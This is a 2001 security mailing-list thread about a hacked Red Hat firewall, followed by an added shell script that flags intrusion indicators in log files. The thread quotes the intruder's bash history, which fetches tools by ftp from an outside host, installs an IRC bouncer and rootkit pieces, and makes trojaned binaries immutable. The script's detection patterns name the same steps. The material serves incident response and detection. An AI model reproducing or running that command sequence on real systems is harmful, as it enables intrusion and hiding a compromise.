[CLUE-Tech] Fwd: Re: blitznet crack attack

jimintriglia at americanisp.net jimintriglia at americanisp.net
Fri Jun 15 07:07:45 MDT 2001


Greetings All,

Interesting post/info on the PortSentry mailing list (see what follows) re: another
successful crack that PortSentry caught after the fact (the damage was done).

For Discussion:

1) The .bash_history that is being reviewed in the post... would that file be
located in the /home/daemon directory, the root user's directory, or what?

2) If PortSentry posts an AttackAlert, what/where .bash_history files should be
viewed and inspected to see what the cracker was up to?

3) I've seen attempts on my own system via port 1080. This is used by servers
running as proxy servers, yes?

Bonus Questions: What did the cracker do, and how did he get in? How could this
have been prevented?

-JimI.

Jim Intriglia
IT Systems and Software Developer
www.JimIntriglia.com

Forwarded Message:
> To: jimintriglia at americanisp.net
> From: "Jim Intriglia" <jimintriglia at hotmail.com>
> Subject: Fwd: Re: [Abacus] blitznet hack
> Date: Fri, 15 Jun 2001 12:39:46 
> -----
> 
> 
> 
> >From: "J.D. Stevens" <dave at stevens.com>
> >To: Ian Campbell <ijac79 at hotmail.com>
> >CC: abacus at psionic.com
> >Subject: Re: [Abacus] blitznet hack
> >Date: Fri, 15 Jun 2001 06:19:12 -0500
> >
> >Disconnect from the Internet. Put in a new disk drive for the operating
> >system. Install the operating system of your choice. Install ALL SECURITY
> >PATCHES. Disable any unnecessary services. Put in appropriate monitoring,
> >blocking, and notification software. I use Tripwire, Portsentry, and
> >Logcheck. Change all passwords on any machines that this one could sniff.
> >Mount the hacked disk read-only in order to extract configurations, account
> >information, etc.
> >
> >Be sure to check any systems accessible from or through the hacked machine.
> >Who knows what they picked up with the sniffer.
> >
> >Hackers got into my RH 6.2 machine in January through wu-ftpd. I had it
> >configured properly, but didn't get a security patch in soon enough. After I
> >rebuilt, they tried many more times to break in. So far so good. There are
> >several vulnerabilities in RH 6.2 as it comes out of the box. The Red Hat
> >web site has information on steps to take to secure the system.
> >
> >My server is a leased system at Rackspace. They provided excellent support
> >after the hack. They provided the suggestion to put in the new drive and
> >mount the old one read-only. They had the new drive and OS installed within
> >four hours of my call. It took me an additional 14 hours to reconfigure the
> >system. I do all of the work remotely. I've never seen or touched the server.
> >
> >   Good luck,
> >
> >   Dave Stevens
> >   STEVENS.COM, Inc.
> >   Houston, TX, USA
> >
> >Ian Campbell wrote:
> > >
> > > Well, got a bit of a shock this morning when I couldn't ssh into the
> > > firewall at a client site.  I got one of the techs there to have a look
> > > and sure enough at the login was the message "eth0 running in promiscuous
> > > mode".  Not a good start.
> > >
> > > The logs show a lot of things that I don't want to see.
> > >
> > > Jun 15 04:54:33 gw inet: inetd shutdown succeeded
> > > Jun 15 04:54:34 gw inetd[5384]: Bad config for ALL:ALL: Incomplete config entry (skipped)
> > > Jun 15 04:54:34 gw inet: inetd startup succeeded
> > > Jun 15 04:55:17 gw inet: inetd shutdown succeeded
> > > Jun 15 04:55:17 gw inet: inetd startup succeeded
> > > Jun 15 05:01:51 gw PAM_pwdb[5628]: (su) session opened for user daemon by (uid=0)
> > > Jun 15 05:01:55 gw modprobe: Note: /etc/conf.modules is more recent than /lib/modules/2.2.14-5.0/modules.dep
> > > Jun 15 05:01:55 gw modprobe: modprobe: Can't locate module net-pf-10
> > > Jun 15 05:02:24 gw PAM_pwdb[5628]: (su) session closed for user daemon
> > > Jun 15 05:03:07 gw PAM_pwdb[5642]: (su) session opened for user daemon by (uid=0)
> > > Jun 15 05:03:09 gw modprobe: Note: /etc/conf.modules is more recent than /lib/modules/2.2.14-5.0/modules.dep
> > > Jun 15 05:03:09 gw modprobe: modprobe: Can't locate module net-pf-10
> > > Jun 15 05:03:59 gw portsentry[682]: attackalert: Connect from host: proxy5.monitor.dal.net/130.227.3.123 to TCP port: 1080
> > > Jun 15 05:03:59 gw portsentry[682]: attackalert: Host 130.227.3.123 has been blocked via wrappers with string: "ALL: 130.227.3.123"
> > > Jun 15 05:04:00 gw portsentry[682]: attackalert: Host 130.227.3.123 has been blocked via dropped route using command: "/sbin/ipchains -I input -s 130.227.3.123 -j DENY -l"
> > > Jun 15 05:04:00 gw kernel: Packet log: input DENY eth1 PROTO=6 130.227.3.123:1604 203.22.71.55:1080 L=44 S=0x60 I=47800 F=0x4000 T=48 SYN (#1)
> > > Jun 15 05:04:03 gw kernel: Packet log: input DENY eth1 PROTO=6 130.227.3.123:1604 203.22.71.55:1080 L=44 S=0x60 I=48032 F=0x4000 T=48 SYN (#1)
> > > Jun 15 05:04:09 gw kernel: Packet log: input DENY eth1 PROTO=6 130.227.3.123:1604 203.22.71.55:1080 L=44 S=0x60 I=48556 F=0x4000 T=48 SYN (#1)
> > > Jun 15 05:04:21 gw kernel: Packet log: input DENY eth1 PROTO=6 130.227.3.123:1604 203.22.71.55:1080 L=44 S=0x60 I=49656 F=0x4000 T=48 SYN (#1)
> > > Jun 15 05:04:45 gw kernel: Packet log: input DENY eth1 PROTO=6 130.227.3.123:1604 203.22.71.55:1080 L=44 S=0x60 I=51276 F=0x4000 T=48 SYN (#1)
> > > Jun 15 05:07:12 gw modprobe: Note: /etc/conf.modules is more recent than /lib/modules/2.2.14-5.0/modules.dep
> > > Jun 15 05:07:12 gw modprobe: modprobe: Can't locate module net-pf-10
> > > Jun 15 05:07:20 gw kernel: Packet log: input DENY eth1 PROTO=6 130.227.3.123:4736 203.22.71.55:1080 L=44 S=0x60 I=64668 F=0x4000 T=48 SYN (#1)
> > > Jun 15 05:07:23 gw kernel: Packet log: input DENY eth1 PROTO=6 130.227.3.123:4736 203.22.71.55:1080 L=44 S=0x60 I=64878 F=0x4000 T=48 SYN (#1)
> > > Jun 15 05:07:29 gw kernel: Packet log: input DENY eth1 PROTO=6 130.227.3.123:4736 203.22.71.55:1080 L=44 S=0x60 I=65170 F=0x4000 T=48 SYN (#1)
> > > Jun 15 05:07:41 gw kernel: Packet log: input DENY eth1 PROTO=6 130.227.3.123:4736 203.22.71.55:1080 L=44 S=0x60 I=256 F=0x4000 T=48 SYN (#1)
> > > Jun 15 05:08:05 gw kernel: Packet log: input DENY eth1 PROTO=6 130.227.3.123:4736 203.22.71.55:1080 L=44 S=0x60 I=1618 F=0x4000 T=48 SYN (#1)
> > > Jun 15 05:16:51 gw PAM_pwdb[5642]: (su) session closed for user daemon
> > > Jun 15 05:17:48 gw kernel: libtty uses obsolete (PF_INET,SOCK_PACKET)
> > > Jun 15 05:17:48 gw kernel: eth0: Promiscuous mode enabled.
> > > Jun 15 05:17:48 gw kernel: device eth0 entered promiscuous mode
> > >
> > >
> > > .bash_history shows what they were up to
> > >
> > > ls -al
> > > pico /etc/inetd.conf
> > > /etc/et
> > > /etc/rc.d/init.d/inet restart
> > > cd /lib/libx.so
> > > ls -al
> > > mv xp mountd
> > > chmod +xs mountd
> > > ls -al
> > > ftp h9.s5.com
> > > ls -al
> > > hostname
> > > gunzip *.gz
> > > ls -al
> > > tar -xvf blitznet.tar
> > > tar -xvf psyBNC2.2.1.tar
> > > ls -al
> > > rm *.tar
> > > chown daemon psybnc
> > > chgrp daemon psybnc
> > > cd psybnc
> > > make
> > > chown daemon *
> > > chgrp daemon *
> > > su daemon
> > > locate bnc
> > > locate psybnc
> > > find / -name psybnc
> > > cd /
> > > locate bnc
> > > cd /lib/libx.so
> > > ls -al
> > > cd psybnc
> > > su daemon
> > > ls -al
> > > cd ..
> > > ls -al
> > > mv lib libtty
> > > chmod +x libtty ps
> > > chmod +xs wipe
> > > ls -al
> > > ./ps psybnc libtty mountd hellnine slice2
> > > chattr +ai /bin/ps
> > > chattr +ai /bin/.ps
> > > chattr +ai /bin/login
> > > ls -al
> > > ./libtty
> > > ps -aux
> > > ls -al
> > > uptime
> > > exit
> > >
> > >
> > > So, I'm still not sure how they actually got in.  The box is running
> > > Red Hat 6.2 without any patches.  What now?  How can I clean my system?
> > >
> > > Should I be upgrading my inetd version?  Can anyone offer any advice or
> > > point me to a security list that can?
> > >
> > > Going to be a busy day.
> > >
> > > Ian
> > >
> >
> >--
> >=====================================================================
> >Dave Stevens      |    dave at stevens.com   |    http://www.stevens.com
> >STEVENS.COM, Inc. |      713-419-0313     | http://www.prettygood.net
> >                   |    Houston, TX, USA   |
> >=====================================================================
> >_______________________________________________
> 
> 
> 
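The thread above answers Jim's first two questions only by example: the history Ian quotes is whatever bash wrote to $HISTFILE (by default $HOME/.bash_history) when the shell exited, so every account with a home directory is a candidate file, and the log lines that actually matter are the root-to-daemon su sessions, the inetd restarts with a broken config, and the kernel's promiscuous-mode messages, not the PortSentry alert, which the timestamps show arriving after the su sessions had already begun. The following triage helper is an added example, not code from the thread or from any of its authors. It turns those indicators into checks that can be run over history and syslog files copied off a disk mounted read-only, as Dave recommends. All sample input is constructed for the demo (modelled on the thread, with an RFC 5737 address and a made-up hostname), and the /tmp work directory and file names are assumptions.

```shell
#!/bin/sh
# Added triage helper, not part of the original thread. It turns the
# indicators visible in Ian's syslog excerpt and .bash_history into checks
# that can be run over any history/syslog file pulled off a disk mounted
# read-only. Every sample input below is CONSTRUCTED for the demo (modelled
# on the thread, RFC 5737 address, fake hostname); the /tmp work directory
# and the file names are assumptions.

# 1. Which history files to read. bash writes its history to $HISTFILE
#    (default $HOME/.bash_history) when the shell exits, so every account
#    with a home directory in passwd is a candidate, not only root.
history_candidates() {   # usage: history_candidates /mnt/old/etc/passwd
    awk -F: '$6 != "" { print $6 "/.bash_history" }' "$1" | sort -u
}

# 2. Shell-history indicators taken from the thread: editing and restarting
#    inetd, a hidden directory under /lib named like a shared object, setuid
#    bits being added, chattr +ai on system binaries (trojaned ps/login made
#    immutable), IRC bouncer/rootkit names, and switching to daemon.
flag_history() {         # usage: flag_history /mnt/old/root/.bash_history
    grep -n -i -E \
        -e '^(pico|vi|vim|ed|nano|joe) +/etc/inetd\.conf' \
        -e '/etc/rc\.d/init\.d/inet +restart' \
        -e '^cd +/lib/[^ ]*\.so' \
        -e '^chmod +[+][a-z]*s ' \
        -e '^chattr +[+][a-z]*[ai] ' \
        -e 'psybnc|blitznet' \
        -e '^su +daemon' \
        "$1"
}

# 3. Syslog indicators from the same intrusion: root su'ing into daemon,
#    inetd bounced with a broken config, and a sniffer enabling promiscuous
#    mode. A PortSentry attackalert is deliberately NOT an indicator here:
#    it records a blocked probe, not the compromise.
flag_syslog() {          # usage: flag_syslog /mnt/old/var/log/messages
    grep -n -E \
        -e '\(su\) session opened for user [^ ]+ by \(uid=0\)' \
        -e 'inetd (shutdown|startup) succeeded' \
        -e 'Bad config for' \
        -e '[Pp]romiscuous mode' \
        "$1"
}

# Number of matching lines; always exits 0 so callers can test the count.
count_hits() { "$@" | grep -c . || true; }

# --- constructed sample input (assumed /tmp work directory) ----------------
TRIAGE_DIR=$(mktemp -d /tmp/triage.XXXXXX)

cat > "$TRIAGE_DIR/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:2:2:daemon:/sbin:/sbin/nologin
ian:x:500:500:Ian:/home/ian:/bin/bash
EOF

cat > "$TRIAGE_DIR/history" <<'EOF'
ls -al
pico /etc/inetd.conf
/etc/rc.d/init.d/inet restart
cd /lib/libx.so
mv xp mountd
chmod +xs mountd
tar -xvf psyBNC2.2.1.tar
su daemon
chattr +ai /bin/ps
chattr +ai /bin/login
./libtty
exit
EOF

cat > "$TRIAGE_DIR/messages" <<'EOF'
Jun 15 04:54:33 gw inet: inetd shutdown succeeded
Jun 15 04:54:34 gw inetd[5384]: Bad config for ALL:ALL: Incomplete config entry (skipped)
Jun 15 04:54:34 gw inet: inetd startup succeeded
Jun 15 05:01:51 gw PAM_pwdb[5628]: (su) session opened for user daemon by (uid=0)
Jun 15 05:03:59 gw portsentry[682]: attackalert: Connect from host: scanner.example.net/192.0.2.10 to TCP port: 1080
Jun 15 05:16:51 gw PAM_pwdb[5642]: (su) session closed for user daemon
Jun 15 05:17:48 gw kernel: eth0: Promiscuous mode enabled.
Jun 15 05:17:48 gw kernel: device eth0 entered promiscuous mode
EOF

# --- demo run --------------------------------------------------------------
echo "history files to review:"
history_candidates "$TRIAGE_DIR/passwd"
echo "suspicious history lines ($(count_hits flag_history "$TRIAGE_DIR/history")):"
flag_history "$TRIAGE_DIR/history"
echo "suspicious syslog lines ($(count_hits flag_syslog "$TRIAGE_DIR/messages")):"
flag_syslog "$TRIAGE_DIR/messages"
```

On a real rebuild the old disk is mounted under some prefix, so the paths printed by history_candidates need that prefix prepended (for example `history_candidates /mnt/old/etc/passwd | sed 's#^#/mnt/old#'`), and `lsattr` on the old /bin and /sbin will show the `i`/`a` flags that the `chattr +ai` lines set on the replaced ps and login. Two caveats: a history file is only evidence if the intruder neglected to unset HISTFILE or delete it (the `wipe` in Ian's listing shows the intent), and it records commands, not how the account was obtained, so it complements rather than replaces the syslog and a file-integrity baseline such as the Tripwire run Dave mentions.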




